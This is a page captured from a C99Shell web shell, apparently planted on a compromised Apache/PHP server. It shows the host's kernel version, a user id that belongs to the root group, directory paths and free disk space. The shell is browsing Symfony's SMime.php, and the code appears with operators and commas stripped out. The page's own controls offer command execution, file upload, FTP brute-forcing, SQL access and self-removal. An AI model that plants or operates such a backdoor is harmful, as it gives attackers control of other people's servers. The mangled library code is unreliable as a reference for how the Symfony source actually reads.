!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/multirest.picotech.app/public_html/vendor/symfony/mime/Crypto/   drwxr-xr-x
Free 28.58 GB of 117.98 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SMime.php (3.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\Mime\Crypto;

use 
Symfony\Component\Mime\Exception\RuntimeException;
use 
Symfony\Component\Mime\Part\SMimePart;

/**
 * @author Sebastiaan Stok <s.stok@rollerscapes.net>
 *
 * @internal
 */
abstract class SMime
{
    protected function 
normalizeFilePath(string $path): string
    
{
        if (!
file_exists($path)) {
            throw new 
RuntimeException(sprintf('File does not exist: "%s".'$path));
        }

        return 
'file://'.str_replace('\\''/'realpath($path));
    }

    protected function 
iteratorToFile(iterable $iterator$stream): void
    
{
        foreach (
$iterator as $chunk) {
            
fwrite($stream$chunk);
        }
    }

    protected function 
convertMessageToSMimePart($streamstring $typestring $subtype): SMimePart
    
{
        
rewind($stream);

        
$headers '';

        while (!
feof($stream)) {
            
$buffer fread($stream78);
            
$headers .= $buffer;

            
// Detect ending of header list
            
if (preg_match('/(\r\n\r\n|\n\n)/'$headers$match)) {
                
$headersPosEnd strpos($headers$headerBodySeparator $match[0]);

                break;
            }
        }

        
$headers $this->getMessageHeaders(trim(substr($headers0$headersPosEnd)));

        
fseek($stream$headersPosEnd \strlen($headerBodySeparator));

        return new 
SMimePart($this->getStreamIterator($stream), $type$subtype$this->getParametersFromHeader($headers['content-type']));
    }

    protected function 
getStreamIterator($stream): iterable
    
{
        while (!
feof($stream)) {
            yield 
str_replace("\n""\r\n"str_replace("\r\n""\n"fread($stream16372)));
        }
    }

    private function 
getMessageHeaders(string $headerData): array
    {
        
$headers = [];
        
$headerLines explode("\r\n"str_replace("\n""\r\n"str_replace("\r\n""\n"$headerData)));
        
$currentHeaderName '';

        
// Transform header lines into an associative array
        
foreach ($headerLines as $headerLine) {
            
// Empty lines between headers indicate a new mime-entity
            
if ('' === $headerLine) {
                break;
            }

            
// Handle headers that span multiple lines
            
if (!str_contains($headerLine':')) {
                
$headers[$currentHeaderName] .= ' '.trim($headerLine);
                continue;
            }

            
$header explode(':'$headerLine2);
            
$currentHeaderName strtolower($header[0]);
            
$headers[$currentHeaderName] = trim($header[1]);
        }

        return 
$headers;
    }

    private function 
getParametersFromHeader(string $header): array
    {
        
$params = [];

        
preg_match_all('/(?P<name>[a-z-0-9]+)=(?P<value>"[^"]+"|(?:[^\s;]+|$))(?:\s+;)?/i'$header$matches);

        foreach (
$matches['value'] as $pos => $paramValue) {
            
$params[$matches['name'][$pos]] = trim($paramValue'"');
        }

        return 
$params;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--